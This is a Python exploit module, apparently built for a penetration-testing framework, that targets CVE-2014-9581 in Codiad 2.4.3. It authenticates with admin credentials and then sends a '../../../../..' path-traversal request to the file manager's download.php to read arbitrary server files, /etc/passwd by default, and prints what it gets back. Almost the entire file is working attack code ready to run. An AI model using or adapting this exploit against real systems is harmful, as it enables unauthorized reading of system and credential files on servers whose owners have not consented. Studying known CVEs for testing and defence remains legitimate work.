#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

try:
    from core.log import Log
    from core.log import color
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log
    from Log import color


class Exploit:
    # 定义该漏洞利用的配置信息
    # 备注:
    #	necessity 表示该参数是否必须配置
    #	default 为该参数的默认值
    config = {
        "remote_host": {"default": "127.0.0.1", "necessity": True},
        "remote_port": {"default": 80, "necessity": True},
        "admin_user": {"default": "admin", "necessity": True},
        "admin_pwd": {"default": "admin", "necessity": True},
        "file": {"default": "/etc/passwd", "necessity": True},
        "interactive": {"default": True, "necessity": True}
    }
    session = requests.Session()

    def __init__(self):
        pass

    def login(self):
        url = "http://%s:%d/components/user/controller.php?action=authenticate" % (self.get_config("remote_host"), int(self.get_config("remote_port")))
        data = {
            "username":self.get_config("admin_user"),
            "password":self.get_config("admin_pwd"),
            "theme":"default",
            "language":"en"
        }
        response = self.session.post(url, data=data)
        content = response.content
        print("[+] Login Content : %s" % (content))
        if 'status":"success"' in content:
            return True
        else:
            return False

    def exploit(self):
        '''
        漏洞利用的核心代码, 在此函数中完成漏洞利用
        '''
        host = self.get_config("remote_host")
        port = self.get_config("remote_port")
        file = self.get_config("file")
        if not self.login():
            Log.Log.error("Login failed!")
            return False
        Log.Log.success("Login successful!")
        url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (host, port, file)
        try:
            response = self.session.get(url)
            if response.status_code == 200:
                Log.Log.success("Exploit success!")
                Log.Log.info(">>>>>> %s <<<<<<" % (file))
                print("%s" % color.blue(response.content))
                return True
            else:
                return False
        except Exception as e:
            Log.Log.error(str(e))
            return False

    def show_options(self):
        '''
        输出该模块的选项信息 (即之前定义的 config)
        由 options 命令触发
        通常不需要改动
        '''
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        for key in sorted(self.config.keys()):
            Log.Log.warning("%s\t\t%s\t\t\t%s" % (
                key, self.config[key]["necessity"], self.get_config(key)))

    def set_config(self, key, value):
        '''
        value®改
        由 set 命令触发
        通常不需要改动
        '''
        if key in self.config.keys():
            self.config[key]["default"] = value
        else:
            Log.Log.error("No such option!")

    def get_config(self, key):
        return self.config[key]["default"]

    def show_info(self):
        '''
        模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等
        该函数在模块被加载的时候自动调用
        需要将其中的信息修改为对应的模块信息
        '''
        Log.Log.info("Name: Codiad (2.4.3) Any file read (CVE-2014-9581)")
        Log.Log.info("Effected Version: <=2.4.3")
        Log.Log.info("Author: TaurusOmar")
        Log.Log.info("Email: taurusomar13@gmail.com")
        Log.Log.info("Twitter: @TaurusOmar_")
        Log.Log.info("Home: overhat.blogspot.com")
        Log.Log.info("Refer:")
        Log.Log.info("\thttps://www.exploit-db.com/exploits/35585/")

def main():
    '''
    测试用例
    '''
    exploit = Exploit()
    exploit.show_info()
    exploit.set_config("remote_host", "localhost")
    exploit.show_options()
    exploit.exploit()

if __name__ == "__main__":
    main()
